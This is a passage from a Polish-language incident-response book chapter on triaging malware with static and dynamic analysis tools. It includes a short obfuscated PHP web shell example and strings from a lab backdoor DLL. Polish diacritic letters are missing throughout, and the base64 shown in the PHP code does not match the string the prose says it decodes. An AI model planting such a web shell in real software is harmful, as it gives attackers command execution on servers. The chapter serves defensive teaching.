stwierdzi, e plik jest typu ASCII text, a w rzeczywistoci bd to skompresowane dane, ktrych
format nie zostanie rozpoznany, ale zawiera tekst ASCII na pocztku. Zatem, cho polecenie file
jest zazwyczaj bardzo przydatne, te moe si pomyli. Dlatego warto zweryfikowa jego odkrycia
wasnorcznie lub za pomoc jeszcze innej techniki.
Czasami ani edytor szesnastkowy, ani polecenie file nie dostarczaj adnych przydatnych
informacji. Jeli pliku nie uda si znale w adnej z oglnodostpnych baz danych, konieczne
bdzie przeprowadzenie dodatkowych bada na wasn rk. Jeli na pocztku pliku znajdziesz
niepowtarzajcy si nigdzie indziej acuch lub szereg bajtw szesnastkowych, moliwe, e uda si
znale jakie informacje w internecie. Poszukaj tych acuchw lub sekwencji bajtw w wyszukiwarce
internetowej, a moe dopisze Ci szczcie. Powiedzmy np., e mamy plik o nazwie ufile.bin
i nastpujce wyniki zwrcone przez polecenie file:
$ file ./ufile.bin
ufile.bin: data
Nie s to zbyt przydatne informacje, wic postanawiamy zbada plik w edytorze szesnastkowym.
W programie FileInsight na pocztku pliku znajdujemy dane pokazane na rysunku 15.2.
RYSUNEK 15.2. Widok pliku ufile.bin w edytorze szesnastkowym
Od razu zwracamy uwag na acuch $SDI0001, cho pewnie nie bardzo wiemy, co on znaczy
przynajmniej my nie wiemy. Szukamy wic tego cigu znakw w ulubionej wyszukiwarce internetowej.
Pierwszy wynik jest zatytuowany SDI file format specification Boot from LAN reboot.pro i naley
do wpisu blogowego pod adresem http://reboot.pro/4182/. Z zawartych tam informacji wynika,
e plik ten jest obrazem rozruchowym. Na stronie znajduj si szczegowe dane o pliku, ktrego
magiczna sygnatura to $SDI0001 i wszystko wydaje si pasowa do reszty danych, jakie znajdujemy
w naszym pliku ufile.bin. We wpisie na blogu podano nawet struktury jzyka C ukazujce,
co zawiera kada cz nagwka. Okazuje si wic, e nie jest to szkodliwy plik, tylko kopia obrazu
oprogramowania ukadowego bezprzewodowego routera. Bardzo szybko udao si zidentyfikowa
typ pliku i nie kosztowao nas to wiele wysiku.
acuchy
Analiza acuchw w pliku to bardzo prosta i czasami niezwykle skuteczna metoda znajdowania
dodatkowych informacji o pliku. Zwykle uywamy narzdzia usuwajcego wszelkie niedrukowalne
znaki i pokazujcego tylko bloki tekstu o okrelonej minimalnej dugoci. W wiecie Uniksa program
taki nazywa si strings i wystpuje standardowo w prawie wszystkich odmianach tego systemu
operacyjnego. W systemie Windows nie ma odpowiednika tego narzdzia, ale polecenie to jest
dostpne w rodowisku Cygwin, a poza tym mona korzysta z innych programw, np. Malcode
Analysis Pack firmy iDefense lub narzdzie strings z pakietu Microsoft SysInternals. Przede wszystkim
naley wybra narzdzie obsugujce nie tylko kodowanie ASCII. Do reprezentacji acuchw
najczciej uywa si standardu Unicode, wic kade przyzwoite narzdzie powinno obsugiwa
zarwno acuchy ASCII, jak i Unicode.
W INTERNECIE
Malcode Analysis Pack github.com/dzzie/MAP
SysInternals strings technet.microsoft.com/en-us/sysinternals/bb897439.aspx
Przyjrzymy si pewnemu plikowi w narzdziu strings i sprbujemy dowiedzie si, co to jest.

Pobralimy pliki laboratoryjne do ksiki Practical Malware Analysis. W tej chwili interesuje nas
plik Lab03-02.dll. W rodowisku Cygwin polecenie file zwrcio nastpujcy wynik:
$ file Lab03-02.dll_
Lab03-02.dll_: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Na podstawie nagwkw mona stwierdzi, e jest to standardowa biblioteka DLL 32-bitowego

systemu operacyjnego Windows. Jeeli plik nie jest spakowany i twrca nie zatar jego funkcjonalnoci,
pomocny powinien by program strings. Jedn z pierwszych rzeczy, jakie rzuc Ci si w oczy
po przepuszczeniu pliku binarnego przez to narzdzie, moe by obecno wielu bezsensownych
acuchw. Poniej znajduje si kilka przykadowych napisw z pocztku pliku, o ktrym jest
teraz mowa:
!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.data
.reloc
QQSUVW3
Hu4S
PSUV
j@SU
D$ 3
|$%Y
D$$SPh
Pocztkowe acuchy w plikach wykonywalnych systemu Windows zawieraj nazwy sekcji i inne
acuchy odnoszce si do nagwkw PE. Zazwyczaj niewielki jest z nich poytek zwaszcza wtedy,
gdy zawieraj typowe nazwy sekcji, takie jak .text i .data. Dalej z reguy znajduj si losowe acuchy,
a po nich znajdujemy obszar z acuchami zawierajcymi nazwy standardowych funkcji API. acuchy
te normalnie oznaczaj wywoania API wpisane w kodzie rdowym pliku wykonywalnego. Niektre
mog wic zdradza szkodliw funkcjonalno pliku. Przykadowo acuchy z tego pliku zawieray
wywoania ReadFile, co sugeruje, e program ten moe wczytywa dane z pliku lokalnego. Ponadto
acuchy InternetConnectA i InternetReadFile wskazuj, e czy si przez sie z jakim systemem.
Jeeli nie znasz nazwy ktrej z funkcji, moesz j sprawdzi w obszernej dokumentacji w portalu
Microsoft Developer Network.
GetModuleFileNameA
Sleep
TerminateThread
WaitForSingleObject
GetSystemTime
CreateThread
GetProcAddress
LoadLibraryA
GetLongPathNameA
GetTempPathA
ReadFile
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetConnectA
InternetOpenA
W INTERNECIE
MSDN msdn.microsoft.com
Pniej prawdopodobnie znajdziesz kolejn porcj losowych acuchw, a dotrzesz do

czytelnego tekstu, ktry moe zawiera acuchy charakterystyczne dla tego programu. Na ich
podstawie moe uda si ucili poprzednie ustalenia, np. dotyczce wywoania InternetConnectA.
Z informacji zawartych w portalu MSDN wynika, e funkcja ta wymaga parametru okrelajcego
nazw serwera, z ktrym ma nawiza poczenie. Zatem w acuchach z pliku moe znajdowa si
adres IP lub nazwa domeny serwera. Cho nie zawsze tak jest (czasami parametr jest zamaskowany
albo generowany dynamicznie), warto mie oczy szeroko otwarte. W tym przykadzie w badanym
pliku znalazy si nastpujce acuchy:
Install
ServiceMain
UninstallService
installA
uninstallA
practicalmalwareanalysis.com
serve.html
CreateProcessA
kernel32.dll
.exe
HTTP/1.1
quit
exit
getfile
cmd.exe /c
Parameters
Type
Start
DisplayName
Description
Depends INA+, Collects and stores network configuration and location information,
and notifies applications when this information changes.
ImagePath
%SystemRoot%\System32\svchost.exe -k
SYSTEM\CurrentControlSet\Services\
Intranet Network Awareness (INA+)
%SystemRoot%\System32\svchost.exe -k netsvcs
OpenSCManager()
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
IPRIP
Na podstawie tych danych mona wycign kilka wnioskw.

Program ma zakodowany algorytm czenia si z konkretnym hostem. Jak napisalimy
wczeniej, spodziewalimy si znale nazw serwera wykorzystywan jako parametr funkcji
InternetConnectA. W danych pojawia si cig znakw practicalmalwareanalysis.com
i nazwa strony HTML (serve.html). Moliwe, e program czy si z domen
practicalmalwareanalysis.com i da strony serve.html.
Program instaluje si jako usuga systemu Windows. W pliku znajduj si acuchy
powszechnie kojarzone z usugami systemu Windows, np. Parameters, Type i DisplayName,
oraz standardowe cieki rejestru usug.
Program moe mie funkcje pobierania plikw i obsugi powoki. acuch cmd /c jest zwykle
kojarzony z wykonywaniem polece wiersza polece. acuchy getfile i CreateProcessA
sugeruj, e aplikacja moe pobiera i wykonywa pliki wybrane przez hakera.
Cho wielu dowiadczonych specjalistw od inynierii wstecznej pewnie wymiaoby wyciganie
takich wnioskw na podstawie analizy acuchw, w rzeczywistoci metoda ta okazuje si bardzo
skuteczna. Dowiadczony analityk jest w stanie do dokadnie wydedukowa informacje na podstawie
takich danych. Naley tylko pamita, e acuchy nigdy nie ukazuj penego obrazu i czasami
mog nawet celowo wprowadza w bd.
Ostrzeenie Pamitaj, e twrcy szkodliwych programw czasami maskuj acuchy w swoich produktach.
To, e nie znajdujesz jakiego acucha, wcale nie znaczy, i go nie ma. Poza tym haker moe
specjalnie dodawa do kodu rne acuchy, aby zmyli analityka. Dlatego nie naley zbytnio
ufa ustaleniom uzyskanym na podstawie analizy acuchw. Bywaj pomocne w pewnych
sprawach, ale waniejsze s logika i cieki wykonywania kodu.
Zakodowane pliki
Czasami natrafiamy na skrypty i inne szkodliwe programy z wielopoziomowym kodowaniem.
Kodowanie zazwyczaj peni dwie funkcje pozwala unikn wykrycia i zamaskowa
funkcjonalno programu. Techniki tego typu bardzo czsto stosuje si w konsolach sieciowych.
Wemy np. poniszy kod w jzyku PHP:
<?php
eval(base64_decode('JF9QT1NUWyJzZWNyZXRDb21tYW5kIl0='));
?>
Na pierwszy rzut oka kod ten moe wydawa si nieszkodliwy i niewprawny analityk
moe si nie domyli, e trzeba rozkodowa ten tekst, aby dowiedzie si, co naprawd znaczy.
Jeli rozkodujemy acuch JF9HRVRbInNlY3JldENvbW1hbmQiXQ== za pomoc algorytmu base64,
otrzymamy kod $_GET["secretCommand"]. Gdybymy teraz w miejsce funkcji base64_decode
z powyszego przykadu wstawili ten tekst, otrzymalibymy nastpujcy skrypt PHP:
<?php
eval($_GET["secretCommand"]);
?>
Ten kod prawdopodobnie narobiby nam kopotw, poniewa umoliwia wykonywanie

wszelkich polece, jakie zostan wysane w parametrze HTTP POST o nazwie secretCommand.
Moe to by dowolny kod PHP wcznie z poleceniem exec umoliwiajcym wykonywanie
polece powoki serwera. Wyobra sobie, co by byo, gdyby taki jeden wiersz kodu dosta si
do duego pliku PHP powiedzmy zawierajcego 1000 wierszy kodu. Prawdopodobnie
nie zauwayby go nikt z obsugi serwisowej ani analitykw.
Przenone pliki wykonywalne

Jako e wikszo szkodliwych plikw to programy rnego typu, postanowilimy napisa kilka
sw na temat metod badania przenonych plikw wykonywalnych (PE). Jeli znajdziesz taki plik,
przeanalizuj go dokadnie za pomoc specjalnego narzdzia, ktre oprcz funkcji analizy ma te
moliwo wywietlania dodatkowych informacji. Istnieje wiele odmian plikw PE i niektre z nich
s bardzo trudne do analizy. Warto zetkn si z tymi trudnociami jak najwczeniej, dziki czemu
pniejsza praca bdzie przebiegaa bez zakce. Przykadowo warto wiedzie, czy plik PE jest
spakowany, zaszyfrowany lub za pomoc jakiego kompilatora zosta utworzony. Sami uywamy
popularnego narzdzia o nazwie PEiD.
W INTERNECIE
www.softpedia.com/progDownload/PEiD-updated-Download-4102.html
www.softpedia.com/get/Programming/Other-Programming-Files/Kanal.shtml
www.softpedia.com/downloadTag/PEiD+plugin
Jeli otworzymy omawiany ju plik Lab03_02.dll w programie PEiD, dowiemy si, e zosta
skompilowany za pomoc kompilatora Microsoft Visual C++ 6.0 DLL (rysunek 15.3). Jest to
podstawowa informacja, ale pozwala oglnie zorientowa si, z jakiego rodzaju plikiem mamy
do czynienia.
RYSUNEK 15.3. Zestawienie wiadomoci na temat przeanalizowanego pliku w programie PEiD
Za pomoc dodatkowej wtyczki kryptograficznej Kanal odkrywamy, e w pliku uyto

algorytmu kodowania BASE64, co wida na rysunku 15.4.
RYSUNEK 15.4. Wyniki wywietlone przez wtyczk Kanal do programu PEiD

Czasami konieczne jest dokadniejsze zbadanie pliku PE. Istnieje kilka narzdzi z funkcj
analizy najwaniejszych struktur danych tych plikw i wywietlajcych zestawienie zebranych
informacji. Najczciej uywamy programw PeView i CFF Explorer.
Zarwno PeView, jak i CFF Explorer dostarczaj szczegowych informacji o strukturach
danych pliku PE. Umoliwiaj przegldanie najwaniejszych sekcji, sprawdzenie czasu kompilacji,
wywietlenie standardowych cech, obejrzenie tabel eksportu i importu oraz analiz wielu innych
struktur danych. Program PeView ma mniej bogaty interfejs, ale wywietla niektre pola danych,
np. czas kompilacji, w czytelniejszy sposb. CFF Explorer dostarcza wikszej iloci informacji
w widoku oraz obsuguje pliki 32- i 64-bitowe oraz pliki binarne .NET. Ponadto CFF Explorer
ma funkcje wydobywania zasobw, przegldania zalenoci i edytowania pl (rysunek 15.5).
RYSUNEK 15.5. Okno programu CFF Explorer
W INTERNECIE
PeView wjradburn.com/software
CFF Explorer www.ntcore.com/exsuite.php
Dependency Walker www.dependencywalker.com
Pliki spakowane
Jeeli plik wykonywalny zawiera tylko kilka czytelnych acuchw albo bardzo niewielk liczb importw,
znaczy to, e moe by spakowany. Spakowany plik to plik poddany dodatkowemu procesowi, ktrego
celem z reguy jest skompresowanie lub zaciemnienie kodu. Proces ten znaczco zmienia zawarto
pliku, ktry mimo to zachowuje swoj pierwotn funkcjonalno. Zmodyfikowany plik moe by
poddany dowolnej kombinacji technik kompresji, szyfrowania, kodowania, antydezasemblacyjnych
i zaciemniajcych kod. Wszystkie te zabiegi wraz ze sposobem dekodowania nowego formatu mog
by bardzo skomplikowane. W celu dokonania zmian proces pakujcy z reguy zapisuje oryginalny
kod w nowym formacie i wstawia kod opakowujcy odpowiedzialny za dekodowanie. Niektre
z najczciej uywanych programw do pakowania to UPX, Aspack, PeCompact, Petite i Armadillo.
Zobaczmy, co mona zrobi ze spakowanym plikiem.
Niektre programy pakujce maj otwarty kod rdowy, wic bez problemu powstay te ich
odpowiedniki rozpakowujce. Dobrym pomysem na pocztek jest sprawdzenie, jakiego programu
pakujcego uyto. Czasami mona go wykry w programie PEiD. Jeli program ten poinformuje,
e plik zosta spakowany za pomoc narzdzia UPX, mona po prostu zainstalowa to narzdzie
u siebie w komputerze i za jego pomoc rozpakowa plik. Zawsze warto poszuka podstawowych
informacji o wykrytym programie pakujcym, aby dowiedzie si, czy istnieje atwe rozwizanie
problemu. Narzdzia do analizy plikw PE potrafi rozpakowywa pliki spakowane za pomoc
niektrych programw pakujcych. Przykadowo program PE Explorer ma funkcj rozpakowywania
plikw UPX, Upack i NSPack. Wikszo innych narzdzi pakujcych wymaga jednak dodatkowej
pracy z debuggerem.
W trakcie sortowania szkodliwych programw mona sprbowa rozpakowa plik za pomoc
debuggera. Niektre debuggery umoliwiaj zrzucanie zaadowanych plikw i czasami dostarczaj
cakowicie lub czciowo rozpakowane dane. Technika ta nie dziaa w odniesieniu do wszystkich
narzdzi do pakowania, ale w wielu przypadkach pozwala uzyska przynajmniej troch informacji.
Pamitaj te, aby uruchamia debugger wycznie w bezpiecznym rodowisku.
Uwaga Moe zauwaye, e cho jest to podrozdzia o analizie statycznej szkodliwego oprogramowania,
powyej znajduje si opis, jak uruchomi program. Ta konkretna czynno zalicza si do kategorii
analizy dynamicznej, ale gwnym celem jest wypakowanie pliku wykonywalnego w celu
przeprowadzenia na nim dalszej analizy statycznej. Nie przygldamy si sposobowi dziaania
programu, aby dowiedzie si, co robi.
Przeanalizujemy przykad na podstawie pliku Lab03-01.exe z ksiki Practical Malware Analysis.

Skorzystamy z popularnego w tych zastosowaniach debuggera o nazwie OllyDbg. Dodatkowo
potrzebna bdzie wtyczka o nazwie OllyDump, ktr mona pobra z witryny OpenRCE.
W INTERNECIE
Program OllyDbg www.ollydbg.de
Wtyczki do programu OllyDbg www.openrce.org/downloads/browse/OllyDbg_Plugins
Pobierz program OllyDbg oraz wtyczk OllyDump i wypakuj je w tym samym katalogu.
Nastpnie uruchom plik OLLYDBG.EXE, aby ukazao si okno gwne debuggera. Sprawd
jeszcze, czy wtyczka OllyDump na pewno zostaa zaadowana w menu Plugins (wtyczki)
powinna widnie pozycja OllyDump, co mona zobaczy na rysunku 15.6.
RYSUNEK 15.6. Opcje wtyczki OllyDump w menu programu OllyDbg
Przejd do menu File/Open (plik/otwrz) i otwrz plik, ktry podejrzewasz o to, e jest
spakowany. OllyDbg zaaduje plik w stanie wstrzymania. Czasami wystarczy tylko wczyta plik,
aby otrzyma rozpakowane dane. Przejd do menu Plugins/OllyDump/Dump Debugged Process
(wtyczki/OllyDump/zrzut debugowanych procesw), pozostaw wszystkie ustawienia bez zmian
i kliknij przycisk Dump (wykonaj zrzut) rysunek 15.7.
Zapisz plik, a nastpnie przejrzyj jego zawarto za pomoc aplikacji strings. Porwnaj to,
co znajdziesz w tym pliku, z zawartoci oryginalnego pliku. Jeeli acuchy s takie same,
prawdopodobnie samo wczytanie pliku nie spowodowao jego rozpakowania. W takim przypadku
naley zastosowa inn metod trzeba pozwoli debuggerowi wykona plik. Kliknij opcj menu
Debug/Run (debugowanie/uruchom). Nastpi prba normalnego uruchomienia programu.
RYSUNEK 15.7. Opcje wtyczki OllyDump
Na tym etapie moe nie uda si kilka rzeczy program moe ulec awarii, moe wykry,
e jest uruchamiany przez debugger i odmwi dziaania, albo w ogle moe nie da si
uruchomi. Cokolwiek by si dziao, poczekaj na zakoczenie procesu zgodnie ze wskazwk
zamieszczon w prawym dolnym rogu paska stanu, a nastpnie wykonaj zrzut za pomoc opcji
Plugins/OllyDump/Dump Debugged Process. Zapisz zrzut w nowym pliku i tak jak wczeniej
porwnaj zawarte w nim acuchy z acuchami z wersji oryginalnej.
Jeli i tym razem Ci si nie powiedzie, musisz poprosi o pomoc bardziej dowiadczonego
specjalist od inynierii wstecznej wirusw, ktry zna zaawansowane techniki, np. przeprowadzi
inspekcj kodu, ustawi punkty wstrzymania, przeskoczy wybrane konstrukcje lub zmodyfikuje kod
tak, aby otrzyma rozpakowan wersj pliku. Jeli masz czas, przygldaj si jego pracy. Wiele technik
atwo powtrzy samemu, jeli troch si powiczy, ale w tej ksice nie ma miejsca na ich opis.
ANALIZA DYNAMICZNA
Drugi rodzaj analizy szkodliwego oprogramowania to analiza dynamiczna. Polega ona na wczeniu
monitoringu systemowego i uruchomieniu szkodliwego programu. Dokonane w niej odkrycia powinny
potwierdzi ustalenia z analizy statycznej oraz ujawni dodatkowe fakty. Czasami przeprowadzenie
takiej analizy jest trudne, gwnie z powodu problemw z prawidowym uruchomieniem szkodliwego
programu. Gdy jednak ju si to uda, mona zdoby znacznie wicej informacji w krtszym czasie
ni za pomoc analizy statycznej.
Analiz dynamiczn mona przeprowadzi przy uyciu narzdzi automatycznych lub rcznie.
Narzdzia automatyczne s szybsze i nie trzeba mie specjalistycznej wiedzy, aby z nich korzysta,
ale nie zawsze dostarczaj przydatnych informacji. Metoda rczna wymaga umiejtnoci posugiwania
si narzdziami monitorujcymi, ale zapewnia mniej moliwoci prawidowego uruchomienia
badanego programu.
Jako e poprzez samo uruchomienie programu trudno moe by odkry ca jego funkcjonalno,
analiza dynamiczna te nie jest rozwizaniem dobrym na wszystko. Przykadowo szkodliwe programy
nie zawsze zawieraj informacje dotyczce sposobu ich uycia oraz mog wymaga podania hasa,
aby wykona niektre gazie kodu. Pomyl o znanych edytorach tekstu. Sama moliwo ich
uruchomienia wcale nie oznacza, e poznamy ich ca funkcjonalno.
Zautomatyzowana analiza dynamiczna piaskownice

Narzdzia do automatycznego wykonywania analizy dynamicznej, zwane piaskownicami (ang. sandbox),
s bardzo atwe w obsudze. Wystarczy poda im kopi szkodliwego programu i po pewnym czasie
otrzymuje si raport z analizy. Istnieje kilka oglnodostpnych piaskownic, wrd ktrych jedn
z najpopularniejszych jest program GFI Sandbox. Mamy te moliwo wysania pliku do analizy
przez stron internetow. Jest to darmowa usuga pozwalajca lepiej pozna sposb dziaania automatw
analitycznych, cho w codziennej pracy czsto nie jest najlepszym wyborem. Ewentualnie mona
te skorzysta z usug w swojej siedzibie, ale dla wikszoci organizacji koszty s zbyt wysokie.
W INTERNECIE
GFI Sandbox www.threattrack.com
W naszej firmie nie korzystamy czsto z oglnodostpnych piaskownic. Mamy trzy wane powody,
ktre te powiniene rozway przy wyborze rozwizania dla siebie. Po pierwsze, podpisujemy z klientami
umow o nieujawnianiu informacji. Nie moemy wic sami zdecydowa si na wysanie danych do
analizy do firmy zewntrznej. Moesz znale si w podobnej sytuacji wynikajcej z uwarunkowa
prawnych lub umownych. Po drugie, automatyczne narzdzia do analizy rzadko dostarczaj odpowiedzi
na nasze pytania. Przykadowo dowiedzenie si, e program tworzy klucz rejestru lub plik, jest dobre
na pocztek, ale o wiele waniejsze jest to, dlaczego i jak ten program jest uywany. Po trzecie,
piaskownice rozwijaj si bardzo wolno. Podczas pracy bdziesz spotyka bardzo duo nowych
rodzin szkodliwego oprogramowania, ktrych analiza bdzie wymaga wprowadzenia zmian
w narzdziach. Jeli nie jeste wacicielem narzdzia i nie masz nad nim kontroli, musisz czeka,
a kto inny zajmie si tym za Ciebie. eby skuteczniej uruchamia szkodliwe programy i wydobywa
z nich wane dla nas informacje, utworzylimy wasne rozwizanie, ktre cay czas udoskonalamy.
Rczna analiza dynamiczna

Aby przeprowadzi analiz dynamiczn rcznie, naley wiedzie, jak system operacyjny aduje
i wykonuje programy oraz umie posugiwa si monitorami, np. monitorem procesw firmy
Microsoft. Ta metoda analizy daje due moliwoci, ale moe by te bardzo czasochonna.
Poniewa jest to rozdzia o sortowaniu szkodliwych programw, naszym gwnym celem jest
zdobywanie dokadnych informacji w jak najkrtszym czasie. Dlatego nie opisujemy tu adnych
zaawansowanych technik analizy dynamicznej, np. wykonywania kodu krok po kroku za pomoc
debuggera OllyDbg czy analizy kodu asemblera. Zamiast tego skupiamy si na metodach, ktre
czsto pozwalaj szybko uzyska cenne informacje.
Uruchamianie szkodliwego programu

Jak napisalimy wczeniej, jedn z najwikszych trudnoci w analizie dynamicznej moe by
zmuszenie programu do uruchomienia si. Aby dowiedzie si, jak uruchomi program, naley
zrozumie kontekst, w jakim zosta znaleziony. Informacje na ten temat powinny zosta
skrupulatnie zanotowane przez osoby, ktre wykryy dany plik w ramach ledztwa. Jeeli brakuje
takich danych, naley poprosi odpowiednie strony o ich udostpnienie. Bez tego wykonanie
programu moe graniczy z niemoliwoci.
Najczciej mamy do czynienia ze szkodliwym oprogramowaniem w postaci plikw binarnych
PE Win32. Wrd nich najwicej znajdujemy plikw wykonywalnych z rozszerzeniem .exe
i bibliotek doczanych dynamicznie, czyli plikw z rozszerzeniem .dll. Podczas analizy
uruchamiamy programy przez wpisanie ich nazwy w wierszu polece i nacinicie klawisza Enter.
Wprawdzie mona te dwukrotnie klikn plik w Eksploratorze Windows, ale wolimy nie pozwala
temu narzdziu na obsug powiza plikowych, poniewa skutki mog by niepodane. Pliki
DLL aduje si w sposb zaleny od ich przeznaczenia. Jednym ze sposobw jest uycie narzdzia
rundll32, ktre aduje pliki DLL:
C:\>rundll32 sample.dll
Czasami pliki DLL bdce backdoorami mog zawiera eksporty instalujce szkodliwe programy
na stae w systemie. Dlatego dobrym pomysem jest zbadanie nazw eksportw i sprawdzenie, czy
ktry z nich si wyrnia. Powiedzmy, e napotykamy plik zawierajcy eksport o nazwie Deploy.
W takim przypadku moemy wykona nastpujce polecenie:
C:\>rundll32 sample.dll,Deploy
Polecenie to spowodowaoby zaadowanie pliku DLL i wywoanie funkcji o nazwie Deploy.

To moe, ale nie musi si uda, lecz zazwyczaj dobrym pomysem jest wyprbowywanie funkcji
o nazwach sugerujcych, e mog ujawni cenne informacje o szkodliwym programie. Czasami
plik DLL moe by przeznaczony do adowania przez okrelon usug, np. Winlogon, w celu
podmiany pliku DLL funkcji Microsoft Graphical Identification and Authentication (GINA).
Jeli analiza statyczna i informacje kontekstowe z zainfekowanych systemw nie pomagaj, trzeba
poszuka pomocy lub samodzielnie sprbowa znale wicej informacji, jak rozwiza problem.
Monitorowanie systemu wykonawczego

Gdy uda si uruchomi lub zaadowa szkodliwy program, naley monitorowa wszystko, co robi.
Najbardziej interesuj nas przypadki tworzenia procesw, zmiany i tworzenia plikw, zmiany
i tworzenia kluczy rejestru oraz aktywno sieciowa. Celem monitorowania tych zdarze jest
wykrycie, co oglnie program robi, i znalezienie tropw do dalszego zbadania. Jeli np. program
tworzy plik, naley sprawdzi jego zawarto. Po przeanalizowaniu tropw zdobytych podczas
monitorowania procesw powinno si mie cakiem dobre pojcie o sposobie dziaania aplikacji.
Pierwsz czynnoci jest wybr narzdzia monitorujcego lub zestawu narzdzi. Najlepiej,
eby takie narzdzie umoliwiao filtrowanie i zapisywanie zdobytych danych. Do najlepszych
darmowych aplikacji tego typu zalicza si monitor procesw firmy Microsoft. Jest to nowy
program czcy funkcjonalno przynajmniej czterech starszych narzdzi z pakietu SysInternals.
Za jego pomoc mona monitorowa procesy, pliki, rejestr i aktywno sieciow oraz filtrowa
zdarzenia na podstawie wielu kryteriw. Mona np. utworzy filtr monitorujcy tylko zdarzenia
pochodzce od procesu o okrelonej nazwie i ciece.
W INTERNECIE
Monitor procesw firmy Microsoft technet.microsoft.com/en-us/sysinternals/bb896645.aspx
Po zainstalowaniu monitora procesw nastpnym krokiem jest rozpoczcie monitorowania

wybranego procesu. Monitor ten rozpoczyna rejestrowanie zdarze natychmiast po tym, jak
zostanie uruchomiony. Mona to przerwa, klikajc ikon lupy i wybierajc z menu pozycj
File/Capture Events (plik/rejestruj zdarzenia) lub naciskajc kombinacj klawiszy Ctrl+E.
Nastpnie naley wyczyci widok za pomoc opcji menu Edit/Clear Display (edycja/wyczy
widok) lub przy uyciu ikony Clear drugiej na prawo od lupy. Teraz moemy przej
do konfiguracji monitora, aby monitorowa tylko interesujce nas procesy.
Standardowo zaczynamy od filtrowania zdarze na podstawie nazwy procesu, ktra jest tosama
z nazw programu. Aby wywietli okno filtrw, naley klikn pozycj menu Filter/Filter
(filtr/filtruj). Gdyby szkodliwy program nazywa si bash.exe, utworzylibymy nowy filtr Process
Name is bash.exe. W tym celu naley wybra nazw procesu z pierwszej listy rozwijanej, a nastpnie
wpisa bash.exe w trzecim polu tekstowym. Pniej trzeba klikn przycisk Add (dodaj). W oknie
filtrw powinna pojawi si nowa pozycja z zielonym znaczkiem obok, co pokazano na rysunku 15.8.
RYSUNEK 15.8. Dodawanie filtru w monitorze procesw
Nastpnie klikamy przycisk OK, aby zapisa filtr. Monitor nie bdzie rejestrowa zdarze
procesw uruchamianych przez szkodliwy program, poniewa zdefiniowalimy filtr bazujcy
na nazwie pliku. Dowiemy si jednak, e jaki proces zosta utworzony, i bdziemy mogli doda
lub zmodyfikowa filtry, aby zarejestrowa wszystkie interesujce nas informacje.
Po zdefiniowaniu filtru mona wczy monitorowanie i uruchomi podejrzany plik. Kliknij

pozycj menu File/Capture Events, aby rozpocz monitorowanie. Podczas wykonywania pliku
sprawdzaj, jakie zdarzenia pokazuj si w oknie monitora. Powinny one pojawia si natychmiast
po wystpieniu i mog wyglda tak, jak na rysunku 15.9.
RYSUNEK 15.9. Zdarzenia zwizane z uruchomieniem powoki BASH rodowiska Cygwin
Jeli zdarzenia nie zaczynaj pojawia si od razu, naley dokadnie sprawdzi ustawienia filtru
oraz to, czy monitor procesw dziaa w trybie rejestracji. Z naszych dowiadcze wynika, e jest to
bardzo niezawodne narzdzie i jeli wystpi jakie problemy, zazwyczaj s one spowodowane
naszym bdem.
Gdy monitor zacznie wywietla informacje o zdarzeniach, mog by ich setki, tysice, a nawet
dziesitki tysicy. Przegldanie ich wszystkich byoby strat czasu, wic trzeba znale sposb
na wybranie podzbioru do wstpnej analizy. W oknie monitora znajduje si kolumna o nazwie
Operation (operacje) przedstawiajca wywoania systemowe wykonywane przez monitorowany
program. Z reguy szukamy tych operacji, ktre daj wiksz szans na odkrycie wanych informacji
na temat badanego szkodliwego programu. Jeli nie ma lepszych tropw, warto zacz od operacji
WriteFile, RegCreateKey i RegSetKey. Wszystkie one wi si z zapisywaniem danych w plikach

oraz tworzeniem kluczy rejestru i zapisywaniem w nich danych. Mona je znale za pomoc
filtrowania lub rcznego przewijania listy wszystkich zdarze.
Uwaga Operacji CreateFile moe by duo, ale nie naley tego interpretowa w ten sposb, e program
naprawd tworzy pliki. Zdarzenie CreateFile moe oznacza operacj utworzenia pliku lub otwarcia
uchwytu do pliku, wic w wielu przypadkach operacja ta suy do odczytania pliku.
Gdy znajdziesz tropy warte dokadniejszego zbadania, moesz potrzebowa dodatkowych

narzdzi umoliwiajcych zdobycie wikszej iloci informacji o wybranych elementach. Chcemy
poleci Ci przede wszystkim trzy narzdzia dwa su do zbierania dodatkowych informacji
o dziaajcych procesach, a jedno do przechwytywania ruchu sieciowego. Oczywicie istnieje
wiele innych pomocnych narzdzi, ale przedstawiamy te, ktrych sami uywamy najczciej.
Narzdzia dotyczce procesw to eksplorator procesw (Process Explorer) firmy Microsoft
i narzdzie Handles. Eksplorator procesw wywietla widok w postaci drzewa przedstawiajcego
hierarchi procesw i wiele szczegowych informacji o parametrach ich dziaania (rysunek 15.10).
RYSUNEK 15.10. Eksplorator procesw firmy Microsoft

Jedn z najbardziej przydatnych funkcji tego programu jest moliwo szukania acuchw
wrd uchwytw do procesw. Moesz np. dowiedzie si, e program rejestrujcy naciskane
klawisze (ang. keylogger) zapisuje dane w pliku o nazwie keylog.txt, ale nie wiesz, jaki proces
wykonuje zapis w tym pliku. Wwczas za pomoc eksploratora procesw mona przeszuka
uchwyty (Find/Find Handle or DLL) z wszystkich procesw w celu znalezienia nazwy keylog.txt
(rysunek 15.11).
RYSUNEK 15.11. Szukanie nazwy pliku w eksploratorze procesw
Handles to narzdzie wiersza polece wywietlajce wszystkie uchwyty wszystkich procesw.

Za jego pomoc mona wyszuka podejrzane uchwyty, np. otwarte pliki w tymczasowych
katalogach w profilu uytkownika.
W INTERNECIE
Microsoft Process Explorer technet.microsoft.com/en-us/sysinternals/bb896653.aspx
Handles technet.microsoft.com/en-us/sysinternals/bb896655.aspx
Trzecie narzdzie to program Wireshark sucy do przechwytywania ruchu sieciowego

i analizy protokow sieciowych (rysunek 15.12). Jeli odkryjesz, e analizowany przez Ciebie
szkodliwy program nawizuje poczenia sieciowe, moesz za pomoc tej aplikacji, opisanej
w rozdziale 9., sprawdzi przesyane przez niego informacje.
W INTERNECIE
Wireshark www.wireshark.org
RYSUNEK 15.12. Okno programu Wireshark
W miar zdobywania dowiadczenia w wykonywaniu analizy dynamicznej prawdopodobnie

odkryjesz take inne narzdzia i techniki, ktrych nie opisalimy w tym rozdziale. Jeli tak,
to wspaniale! Bdzie to oznaczao, e nabye umiejtno wstpnej analizy szkodliwego
oprogramowania.
I CO Z TEGO
W wikszoci incydentw hakerzy wykorzystuj szkodliwe programy lub inne narzdzia, aby
